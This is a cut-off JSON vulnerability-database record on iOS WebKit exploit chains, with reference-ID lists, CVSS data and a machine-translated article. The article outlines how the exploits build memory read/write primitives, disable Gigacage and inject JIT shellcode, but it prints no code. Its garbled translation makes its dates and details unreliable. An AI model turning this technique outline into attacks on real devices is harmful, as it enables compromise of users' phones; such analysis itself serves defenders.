["0F66B901-715C-11E7-AD1F-BCAEC565249C", "3DD46E05-9FB0-11E9-BF65-00012E582166", "E3AACD6D-3D01-434C-9330-BC9EFD40350F"]}, {"type": "gentoo", "idList": ["GLSA-201706-15", "GLSA-201808-04", "GLSA-201811-10", "GLSA-201903-12", "GLSA-201909-05"]}, {"type": "googleprojectzero", "idList": ["GOOGLEPROJECTZERO:0A90A47458C0D2B6B85F5BC6C0105ECC", "GOOGLEPROJECTZERO:1207813731774186F9A98E4FD3472E6D", "GOOGLEPROJECTZERO:1863643ADC4EF2ABEE526299696C931D", "GOOGLEPROJECTZERO:4379524F316D6C7FA6682653798DC052", "GOOGLEPROJECTZERO:583848E2AA028400AD8E69515795E246", "GOOGLEPROJECTZERO:63C5590C80947E05972B1E741DE19C77", "GOOGLEPROJECTZERO:6555AE6CE499D9D30373C3D7100AD02F", "GOOGLEPROJECTZERO:7252C6A752FFE952836D88899C945E7F", "GOOGLEPROJECTZERO:8D9092AAADD845D0E49147A5BA49EA02", "GOOGLEPROJECTZERO:8F5F85400267DF1EFD1897A0E2FF0671", "GOOGLEPROJECTZERO:B6FB33FF19AE0AD0E463FE10F35B3778", "GOOGLEPROJECTZERO:EF1A7F815096A60102501F0E31BD67D4", "GOOGLEPROJECTZERO:F5CF6A432B61D584C074F681DBED3349"]}, {"type": "kaspersky", "idList": ["KLA11075", "KLA11281", "KLA11338", "KLA11384", "KLA11408", "KLA11409", "KLA11455", "KLA11456"]}, {"type": "kitploit", "idList": ["KITPLOIT:8766743662298222785"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/MULTI/BROWSER/CHROME_OBJECT_CREATE", "MSF:ILITIES/ALPINE-LINUX-CVE-2017-2505/", "MSF:ILITIES/ORACLE-SOLARIS-CVE-2017-2505/"]}, {"type": "myhack58", "idList": ["MYHACK58:62201996030"]}, {"type": "nessus", "idList": ["700116.PRM", "700117.PRM", "700118.PRM", "700166.PRM", "700167.PRM", "700168.PRM", "700503.PRM", "700507.PRM", "700508.PRM", "700548.PRM", "700555.PRM", "700556.PRM", "700558.PRM", "ALMA_LINUX_ALSA-2019-3553.NASL", "APPLETV_10_2_1.NASL", "APPLETV_11_3.NASL", "APPLETV_12_1_1.NASL", "APPLETV_12_4.NASL", "APPLE_IOS_1032_CHECK.NBIN", "APPLE_IOS_1033_CHECK.NBIN", "APPLE_IOS_113_CHECK.NBIN", "APPLE_IOS_1211_CHECK.NBIN", "APPLE_IOS_1213_CHECK.NBIN", "APPLE_IOS_122_CHECK.NBIN", "APPLE_IOS_124_CHECK.NBIN", "CENTOS8_RHSA-2019-3553.NASL", "DEBIAN_DSA-4330.NASL", "FEDORA_2017-24BDDB96B5.NASL", "FEDORA_2017-73D6A0DFBB.NASL", "FEDORA_2017-9D572CC64A.NASL", "FEDORA_2018-34F7F68029.NASL", "FEDORA_2018-FD194A1F14.NASL", "FREEBSD_PKG_0F66B901715C11E7AD1FBCAEC565249C.NASL", "FREEBSD_PKG_3DD46E059FB011E9BF6500012E582166.NASL", "FREEBSD_PKG_E3AACD6D3D01434C9330BC9EFD40350F.NASL", "GENTOO_GLSA-201706-15.NASL", "GENTOO_GLSA-201808-04.NASL", "GENTOO_GLSA-201811-10.NASL", "GENTOO_GLSA-201903-12.NASL", "GENTOO_GLSA-201909-05.NASL", "GOOGLE_CHROME_70_0_3538_67.NASL", "ITUNES_12_6_2.NASL", "ITUNES_12_6_2_BANNER.NASL", "ITUNES_12_7_4.NASL", "ITUNES_12_7_4_BANNER.NASL", "ITUNES_12_9_2.NASL", "ITUNES_12_9_3.NASL", "MACOSX_GOOGLE_CHROME_70_0_3538_67.NASL", "MACOSX_SAFARI10_1_1.NASL", "MACOSX_SAFARI10_1_2.NASL", "MACOSX_SAFARI11_1_0.NASL", "MACOSX_SAFARI12_0_2.NASL", "MACOSX_SAFARI12_0_3.NASL", "MACOSX_SECUPD2019-004.NASL", "MACOS_10_14_6.NASL", "MACOS_ITUNES_12_6_2.NASL", "NEWSTART_CGSL_NS-SA-2021-0041_WEBKITGTK4.NASL", "NEWSTART_CGSL_NS-SA-2021-0166_WEBKITGTK4.NASL", "OPENSUSE-2017-1268.NASL", "OPENSUSE-2018-118.NASL", "OPENSUSE-2018-1208.NASL", "OPENSUSE-2018-1253.NASL", "OPENSUSE-2018-1288.NASL", "OPENSUSE-2019-108.NASL", "OPENSUSE-2019-1374.NASL", "OPENSUSE-2019-308.NASL", "OPENSUSE-2019-309.NASL", "OPENSUSE-2019-712.NASL", "OPENSUSE-2019-81.NASL", "REDHAT-RHSA-2018-3004.NASL", "SUSE_SU-2017-2933-1.NASL", "SUSE_SU-2018-0219-1.NASL", "SUSE_SU-2018-3387-1.NASL", "SUSE_SU-2019-0092-1.NASL", "SUSE_SU-2019-0146-1.NASL", "SUSE_SU-2019-0497-1.NASL", "SUSE_SU-2019-0511-1.NASL", "SUSE_SU-2019-1137-1.NASL", "UBUNTU_USN-3376-1.NASL", "UBUNTU_USN-3635-1.NASL", "UBUNTU_USN-3948-1.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310704330", "OPENVAS:1361412562310810988", "OPENVAS:1361412562310811251", "OPENVAS:1361412562310811252", "OPENVAS:1361412562310811535", "OPENVAS:1361412562310813109", "OPENVAS:1361412562310813110", "OPENVAS:1361412562310813111", "OPENVAS:1361412562310814094", "OPENVAS:1361412562310814095", "OPENVAS:1361412562310814096", "OPENVAS:1361412562310814601", "OPENVAS:1361412562310814602", "OPENVAS:1361412562310814603", "OPENVAS:1361412562310814820", "OPENVAS:1361412562310814821", "OPENVAS:1361412562310814822", "OPENVAS:1361412562310814875", "OPENVAS:1361412562310814876", "OPENVAS:1361412562310815005", "OPENVAS:1361412562310815426", "OPENVAS:1361412562310843266", "OPENVAS:1361412562310843514", "OPENVAS:1361412562310843977", "OPENVAS:1361412562310851645", "OPENVAS:1361412562310851693", "OPENVAS:1361412562310851948", "OPENVAS:1361412562310851995", "OPENVAS:1361412562310852089", "OPENVAS:1361412562310852248", "OPENVAS:1361412562310852266", "OPENVAS:1361412562310852337", "OPENVAS:1361412562310852338", "OPENVAS:1361412562310852488", "OPENVAS:1361412562310873180", "OPENVAS:1361412562310873200", "OPENVAS:1361412562310873226", "OPENVAS:1361412562310875299", "OPENVAS:1361412562310876138"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142664", "PACKETSTORM:143479", "PACKETSTORM:150746", "PACKETSTORM:151180", "PACKETSTORM:156640"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:E8EB68630D38C60B7DE4AF696474210D"]}, {"type": "redhat", "idList": ["RHSA-2018:3004", "RHSA-2019:3553", "RHSA-2020:4298"]}, {"type": "redhatcve", "idList": ["RH:CVE-2018-17463"]}, {"type": "seebug", "idList": ["SSV:93145", "SSV:96302"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2017:2991-1", "OPENSUSE-SU-2018:0326-1", "OPENSUSE-SU-2018:3273-1", "OPENSUSE-SU-2018:3396-1", "OPENSUSE-SU-2018:3473-1", "OPENSUSE-SU-2018:3835-1", "OPENSUSE-SU-2019:0081-1", "OPENSUSE-SU-2019:0108-1", "OPENSUSE-SU-2019:0308-1", "OPENSUSE-SU-2019:0309-1", "OPENSUSE-SU-2019:1374-1", "SUSE-SU-2017:2933-1", "SUSE-SU-2018:0219-1"]}, {"type": "thn", "idList": ["THN:41F66983564CEDB5C54CCEB8BE4F793F"]}, {"type": "threatpost", "idList": ["THREATPOST:2EA02E029D18D4A6E2F53BF8057CCD57", "THREATPOST:37BD8473EEF61891FD09D32105F6C9E1", "THREATPOST:B84F22695A74E8F253EEEB07BE113A5B", "THREATPOST:F9C72E526BBB62D96B4E4E624AFFFF54"]}, {"type": "ubuntu", "idList": ["USN-3376-1", "USN-3635-1", "USN-3948-1"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2017-2505", "UB:CVE-2017-7064", "UB:CVE-2018-17463", "UB:CVE-2018-4122", "UB:CVE-2018-4438", "UB:CVE-2018-4442", "UB:CVE-2019-6217", "UB:CVE-2019-8518"]}, {"type": "zdi", "idList": ["ZDI-18-271", "ZDI-19-124"]}, {"type": "zdt", "idList": ["1337DAY-ID-28183", "1337DAY-ID-31778", "1337DAY-ID-31982", "1337DAY-ID-32484", "1337DAY-ID-33062", "1337DAY-ID-34054"]}], "rev": 4}, "score": {"value": 5.1, "vector": "NONE"}, "backreferences": {"references": [{"type": "apple", "idList": ["APPLE:0185CC37EE7038D3199A6E5B2057A61C", "APPLE:100C3E37B89C4B8E50DE097059456EC2", "APPLE:114C93F6E9562A87B113C0263CD1817D", "APPLE:21F236C1A9D411224D0D290A7D88873F", "APPLE:26A4DD401596A54883933FFA750F140A", "APPLE:34416127035F64778C9F3F0EB9CDBC11", "APPLE:423789A788D6D3E2809B401C45687850", "APPLE:42A8665131AAD41DD01DD2DE9BBDEBC5", "APPLE:444B5944D49C1B1DB2F8D833473A3E28", "APPLE:44A3ECC7D3B2719CF4A259F2E411BB53", "APPLE:45AEF0978F404334493CA78A1CA75347", "APPLE:48DFAA81838B82F0614B9A03F99F251D", "APPLE:4D5091F8F1A9B18C444D1AD97567CE76", "APPLE:5C4BCF7A4E483742CFDCE8A4CB334C8E", "APPLE:5D035145E3EE53A8C36DC063A0DC8B49", "APPLE:5DC0F458B41AAC5AEDC2DDFE4C176AA7", "APPLE:66FADA9BFB47C90D568A156164B964D6", "APPLE:6B41E03BE95C41152A91DE7584480E16", "APPLE:6C518E60468B6DC0634A48452DB0FFBE", "APPLE:71C21790A57960E5B8D57DC4227D5449", "APPLE:7AFC35B4B1D8C25A050E4C951554FD97", "APPLE:819AEF513AB880D6C4F6CA66CB3C0021", "APPLE:8C49A1E8A033BC61B2EB11E42BABEFC6", "APPLE:9B31F90F381961095FA996D2A3A9579C", "APPLE:A49C40F4327A861EBE2E91DA2786C348", "APPLE:B4A175C182756FCB9C8C7BC8F7CC89F0", "APPLE:B93E9072DD7B0B072DE4948F392F64AE", "APPLE:B9D8B8E6AD5C97CD8596F47682EA2AD9", "APPLE:CEC7DCE5379D5C1DBB2795CA582D13CD", "APPLE:CFC2451DF75048E4D98C6C690A558872", "APPLE:D6582852ADC12259E5A65509B1EDEA8C", "APPLE:DB93D66014439127A48A03A39A345E1E", "APPLE:E1B2FDC8AFC1E2B240E65D382EBD5FEA", "APPLE:F5ED4B2C8BF2CB139C4753A54898E258", "APPLE:F7C054E723805E34E0E58C0D3E614976", "APPLE:HT207798", "APPLE:HT207801", "APPLE:HT207804", "APPLE:HT207921", "APPLE:HT207923", "APPLE:HT207927", "APPLE:HT207928", "APPLE:HT208693", "APPLE:HT208694", "APPLE:HT208695", "APPLE:HT208696", "APPLE:HT208697", "APPLE:HT208698", "APPLE:HT209340", "APPLE:HT209342", "APPLE:HT209343", "APPLE:HT209344", "APPLE:HT209345", "APPLE:HT209346", "APPLE:HT209443", "APPLE:HT209447", "APPLE:HT209448", "APPLE:HT209449", "APPLE:HT209450", "APPLE:HT209451", "APPLE:HT209599", "APPLE:HT209601", "APPLE:HT209602", "APPLE:HT209603", "APPLE:HT209604", "APPLE:HT209605", "APPLE:HT210346", "APPLE:HT210348", "APPLE:HT210351", "APPLE:HT210353"]}, {"type": "archlinux", "idList": ["ASA-201707-25", "ASA-201810-12"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-1037", "CPAI-2017-1038", "CPAI-2018-1319", "CPAI-2018-1320", "CPAI-2018-1597", "CPAI-2019-1098", "CPAI-2019-2192"]}, {"type": "chrome", "idList": ["GCSA-1598641215032171443"]}, {"type": "cve", "idList": ["CVE-2017-2505", "CVE-2017-7064", "CVE-2018-4122"]}, {"type": "debian", "idList": ["DEBIAN:DSA-4330-1:C6D67"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2018-17463"]}, {"type": "fedora", "idList": ["FEDORA:33FB9639A184", "FEDORA:417B06017118", "FEDORA:532F960CF00C", "FEDORA:D681D609273A", "FEDORA:DA59A6087D6C"]}, {"type": "freebsd", "idList": ["0F66B901-715C-11E7-AD1F-BCAEC565249C", "3DD46E05-9FB0-11E9-BF65-00012E582166"]}, {"type": "gentoo", "idList": ["GLSA-201808-04"]}, {"type": "googleprojectzero", "idList": ["GOOGLEPROJECTZERO:0A90A47458C0D2B6B85F5BC6C0105ECC", "GOOGLEPROJECTZERO:1207813731774186F9A98E4FD3472E6D", "GOOGLEPROJECTZERO:1863643ADC4EF2ABEE526299696C931D", "GOOGLEPROJECTZERO:4379524F316D6C7FA6682653798DC052", "GOOGLEPROJECTZERO:583848E2AA028400AD8E69515795E246", "GOOGLEPROJECTZERO:63C5590C80947E05972B1E741DE19C77", "GOOGLEPROJECTZERO:6555AE6CE499D9D30373C3D7100AD02F", "GOOGLEPROJECTZERO:7252C6A752FFE952836D88899C945E7F", "GOOGLEPROJECTZERO:8D9092AAADD845D0E49147A5BA49EA02", "GOOGLEPROJECTZERO:8F5F85400267DF1EFD1897A0E2FF0671", "GOOGLEPROJECTZERO:B6FB33FF19AE0AD0E463FE10F35B3778", "GOOGLEPROJECTZERO:EF1A7F815096A60102501F0E31BD67D4", "GOOGLEPROJECTZERO:F5CF6A432B61D584C074F681DBED3349"]}, {"type": "kaspersky", "idList": ["KLA11075"]}, {"type": "kitploit", "idList": ["KITPLOIT:8766743662298222785"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/MULTI/BROWSER/CHROME_OBJECT_CREATE"]}, {"type": "myhack58", "idList": ["MYHACK58:62201996030"]}, {"type": "nessus", "idList": ["APPLETV_10_2_1.NASL", "DEBIAN_DSA-4330.NASL", "FEDORA_2017-24BDDB96B5.NASL", "FEDORA_2017-73D6A0DFBB.NASL", "FEDORA_2017-9D572CC64A.NASL", "FREEBSD_PKG_0F66B901715C11E7AD1FBCAEC565249C.NASL", "GENTOO_GLSA-201808-04.NASL", "ITUNES_12_6_2.NASL", "ITUNES_12_7_4.NASL", "MACOSX_SAFARI10_1_1.NASL", "MACOSX_SAFARI10_1_2.NASL", "MACOSX_SAFARI11_1_0.NASL", "OPENSUSE-2018-118.NASL", "SUSE_SU-2017-2933-1.NASL", "SUSE_SU-2018-0219-1.NASL", "UBUNTU_USN-3376-1.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310704330", "OPENVAS:1361412562310810988", "OPENVAS:1361412562310811251", "OPENVAS:1361412562310811252", "OPENVAS:1361412562310811535", "OPENVAS:1361412562310813109", "OPENVAS:1361412562310813110", "OPENVAS:1361412562310813111", "OPENVAS:1361412562310815426", "OPENVAS:1361412562310851995", "OPENVAS:1361412562310852089", "OPENVAS:1361412562310873180", "OPENVAS:1361412562310873200"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142664", "PACKETSTORM:143479", "PACKETSTORM:156640"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:E8EB68630D38C60B7DE4AF696474210D"]}, {"type": "redhat", "idList": ["RHSA-2018:3004"]}, {"type": "redhatcve", "idList": ["RH:CVE-2018-17463"]}, {"type": "seebug", "idList": ["SSV:93145", "SSV:96302"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2018:0326-1", "SUSE-SU-2017:2933-1", "SUSE-SU-2018:0219-1"]}, {"type": "thn", "idList": ["THN:41F66983564CEDB5C54CCEB8BE4F793F"]}, {"type": "threatpost", "idList": ["THREATPOST:0F9EDE9A622A021B9B79C50214D7E8AD", "THREATPOST:5121F056A99F51D23A4BB71AF117FA3C", "THREATPOST:B84F22695A74E8F253EEEB07BE113A5B"]}, {"type": "ubuntu", "idList": ["USN-3376-1"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2018-17463", "UB:CVE-2018-4122", "UB:CVE-2018-4438", "UB:CVE-2018-4442", "UB:CVE-2019-6217", "UB:CVE-2019-8518"]}, {"type": "zdi", "idList": ["ZDI-19-124"]}, {"type": "zdt", "idList": ["1337DAY-ID-28183", "1337DAY-ID-34054"]}]}, "exploitation": null, "vulnersScore": 5.1}, "_state": {"dependencies": 1647589307, "score": 0}}

{"myhack58": [{"lastseen": "2019-09-17T10:34:08", "description": "In this article, we will Analysis on your iOS device to get the normal permissions of the shell of the WebKit exploit method, where all the vulnerabilities are available on iOS's sandboxed renderer process WebContent implemented shellcode code execution. Although on iOS Chrome will also be affected by these browser vulnerabilities to attack, but the attacker would just use them to locate the Safari and the iPhone's location. \nThis article will first briefly describe each use of the WebKit vulnerabilities and an attacker how from build a memory read/write primitives, and then outlines for shellcode code execution techniques as well as how to bypass the existing JIT code injection mitigation measures. \nInterestingly, these vulnerabilities do not have a vulnerability to bypass on the A12 on the device are enabled based on PAC JIT strengthen mitigation measures. Exploits by vulnerability to support the latest iOS version, if the exploit is missing in the version check, it will be based on the repair date and prior to the vulnerability to guess the supported version range. \nThe sandboxed renderer process using the first get memory read/write functions, and then the shellcode injected into the JIT area to obtain the native code execution privileges. It seems every time you broke a new major can exploit the vulnerability, the new vulnerability will be added to the framework to use to do read/write check, and then inserted into the existing exploit frameworks. The exploits used are also common exploit techniques, for example, first create addrof and fakeobj primitive, then fake JS object to implement the read/write. \nFor many exploit programs, it is unclear whether they have in some 0day or 1day on successful use. Now also don't know the attacker is how to first get these vulnerability information. Typically, they are used to repair the finish after the release of the public exploit to use. WebKit in the fix version is sent to the user before publishing the vulnerability details. CVE-2019-8518 is in 2019 2 May 9, WebKit HEAD disclosed in repair, submitted for 4a23c92e6883 it. This commit contains a test case, the test cases triggered a vulnerability and lead to a JSArray of cross-border access, this situation is usually very easy to exploit. However, the fixes only in 2019 3 December 25 release iOS 12.2 user post, is in about the vulnerability details publicly after a month and a half before release. The technical ability of the user to be within a few days time to replace the underlying vulnerabilities, thereby obtaining the advantage of the latest capabilities of the device, without self-tap new holes. This may occur at least in some of the following vulnerabilities in. \nIn order to do the comparison, the following is a list of the other browser vendors is how to deal with this vulnerability window problems: \nGoogle and Chromium the same problem exists, for example, submitted 52a9e67a477b fix for CVE-2018-17463-in. However, it seems some of the recent vulnerabilities release no longer contains the JavaScript test cases. For example, our team members Sergey Glazunov reported the following two for the vulnerability fix: aa00ee22f8f7 for vulnerability 1784 and 4edcc8605461 for vulnerability 1793 in. \nMicrosoft will open source the Chakra engine in the security fixes that confidential treatment until the fix has been sent to the user before the public. Then released the repair after the procedure and publishes the CVE number. For this example, see commit 7f0d390ad77d it. However, it should be noted that the Chakra will soon be the Edge of the V8\uff08Chromium's JavaScript engine replaced. \nMozilla directly prohibits a public repository of security fixes, they will directly release the next version. In addition, it is not disclosed for triggering a vulnerability in the JavaScript test cases. \nHowever, it is worth noting that, even if the Don't get the JavaScript test case, you can still through a code patch written in the PoC and eventually exploit the vulnerability. \n\n0x01 exploit 1: iOS 10.0~10.3.2 \nThis exploits the target is CVE-2017-2505, initially by lokihardt report for Project Zero issue 1137, and in 2017 to 3 January 11, on the WebKit HEAD by submission 4a23c92e6883 repair. The fix is then in the 5 on 15, publishing to the iOS 10.3.2 the user. Interestingly, the exploit exp is almost the WebKit repository in the bug report and test file exactly the same. You can see in the image below, the left image is displayed in the WebKit code repository publish a test with the example on the right shows the triggering of vulnerabilities in the wild exploit code part. \n! [](/Article/UploadPic/2019-9/2019917134229760. png) \nThe vulnerability will lead to the use of controlled data writes to achieve the JSC heap bounds. Attacker destruction of controlled JSObject one of the first QWord, changing its structure ID to the run-time type information with JSCell associated with to make it appear as a Uint32Array with. Thus, they actually created a fake TypedArray, will directly allow them to construct a memory read/write primitives. \n\n0x02 exploit 2: iOS 10.3~10.3.3 \nThe exploit is for CVE-2017-7064 or its variant, which was originally by lokihardt found and reported as issue 1236 in. The vulnerability has been in 2017 4 November 18 in the WebKit HEAD by submission ad6d74945b13 repair, and in 2017, the 7 on 19, released to the iOS 10.3.3 of the user. The vulnerabilities could cause uninitialized memory to be treated as JS array of content, through reactor operation technology, you can control the uninitialized data, this time by the double-precision and JSValues between the type of confused structure addrof and fakeobj primitive, so that by construction forged TypedArray get memory read/write. \n\n0x03 exploit 3: iOS 11.0~11.3 \nThis exploit is a WebKit vulnerability 181867, the CVE number might be CVE-2018-4122\u3002 It in 2018 1 November 19 in the WebKit HEAD in repair, and in 2018 3 May 29, released to iOS 11.3 the user. The vulnerability is typical of the JIT side-effect problems. It is unclear how the attacker is in early 2018 will know of this vulnerability. The vulnerability through the confusion is not initialized double, and Whether the array built addrof and fakeobj primitive, and then again by forgery to obtain memory read/write a typed array of objects. \n\n0x04 exploits 4: iOS 11.3~11.4.1 \nThis exploit is for the 2018 \u5e74 5 \u6708 16 filed in the b4e567d371fd fix the vulnerability, and corresponding to the WebKit bug report 185694 it. Unfortunately, we are unable to determine the allocation to this issue of the CVE, but it seems that the patches in 2018 7 May 9, publishing to the iOS 11.4.1 the user. This is another JIT side-effect issues, similar to the previous vulnerability, again constructed fakeobj primitive to forge a JS object. However, it has now been released Gigacage mitigation measures. Therefore, construction of the pseudo-ArrayBuffers / TypedArrays are no longer useful. \nThe exploit constructs a fake unboxed double Array, and get an initial, limited memory read/write primitives. Then using the initial primitive to disable Gigacage mitigation measures, and then continue to use TypedArrays to perform behind the exploits. \n\n0x05 exploit 5: iOS 11.4.1 \nThe exploit is for CVE-2018-4438 vulnerability, the lokihardt report of 1649 it. This vulnerability is in 2018 10 May 26 using the commit 8deb8bd96f4a repair, and in 2018, 12 \u6708 5 issued to the iOS 12.1.1 the user. The wrong hole you can build a proxy the prototype of the array, and then, by the JIT-compiled code in the trigger change, this vulnerability is converted to the JIT side-effect problems. The vulnerability before the vulnerability is very similar, first using the limited JS array read/write disable Gigacage mitigation measures, and then by TypedArrays perform a full read/write the shellcode to be injected. \n\n\n**[1] [[2]](<96030_2.htm>) [next](<96030_2.htm>)**\n", "edition": 2, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-09-17T00:00:00", "title": "In-depth exploration found in the wild iOS exploit chain VI-vulnerability warning-the black bar safety net", "type": "myhack58", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-8518", "CVE-2017-7064", "CVE-2018-4438", "CVE-2017-2505", "CVE-2018-17463", "CVE-2018-4122"], "modified": "2019-09-17T00:00:00", "id": "MYHACK58:62201996030", "href": "http://www.myhack58.com/Article/html/3/62/2019/96030.htm", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "ubuntucve": [{"lastseen": "2022-01-31T11:44:44", "description": "Multiple memory corruption issues were addressed with improved memory\nhandling. This issue is fixed in iOS 12.1.3, tvOS 12.1.2, watchOS 5.1.3,\nSafari 12.0.3, iTunes 12.9.3 for Windows, iCloud for Windows 7.10.\nProcessing maliciously crafted web content may lead to arbitrary code\nexecution.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[jdstrand](<https://launchpad.net/~jdstrand>) | webkit receives limited support. For details, see https://wiki.ubuntu.com/SecurityTeam/FAQ#webkit webkit in Ubuntu uses the JavaScriptCore (JSC) engine, not V8\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-03-05T00:00:00", "type": "ubuntucve", "title": "CVE-2019-6217", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-6217"], "modified": "2019-03-05T00:00:00", "id": "UB:CVE-2019-6217", "href": "https://ubuntu.com/security/CVE-2019-6217", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-22T21:34:15", "description": "Incorrect side effect annotation in V8 in Google Chrome prior to\n70.0.3538.64 allowed a remote attacker to execute arbitrary code inside a\nsandbox via a crafted HTML page.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-11-14T00:00:00", "type": "ubuntucve", "title": "CVE-2018-17463", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-17463"], "modified": "2018-11-14T00:00:00", "id": "UB:CVE-2018-17463", "href": "https://ubuntu.com/security/CVE-2018-17463", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-01-21T20:34:33", "description": "Multiple memory corruption issues were addressed with improved memory\nhandling. This issue is fixed in iOS 12.2, tvOS 12.2, watchOS 5.2, Safari\n12.1, iTunes 12.9.4 for Windows, iCloud for Windows 7.11. Processing\nmaliciously crafted web content may lead to arbitrary code execution.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[jdstrand](<https://launchpad.net/~jdstrand>) | webkit receives limited support. For details, see https://wiki.ubuntu.com/SecurityTeam/FAQ#webkit webkit in Ubuntu uses the JavaScriptCore (JSC) engine, not V8\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-04-11T00:00:00", "type": "ubuntucve", "title": "CVE-2019-8518", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-8518"], "modified": "2019-04-11T00:00:00", "id": "UB:CVE-2019-8518", "href": "https://ubuntu.com/security/CVE-2019-8518", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-21T20:34:41", "description": "A memory corruption issue was addressed with improved memory handling. This\nissue affected versions prior to iOS 12.1.1, tvOS 12.1.1, watchOS 5.1.2,\nSafari 12.0.2, iTunes 12.9.2 for Windows, iCloud for Windows 7.9.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[jdstrand](<https://launchpad.net/~jdstrand>) | webkit receives limited support. For details, see https://wiki.ubuntu.com/SecurityTeam/FAQ#webkit webkit in Ubuntu uses the JavaScriptCore (JSC) engine, not V8\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, 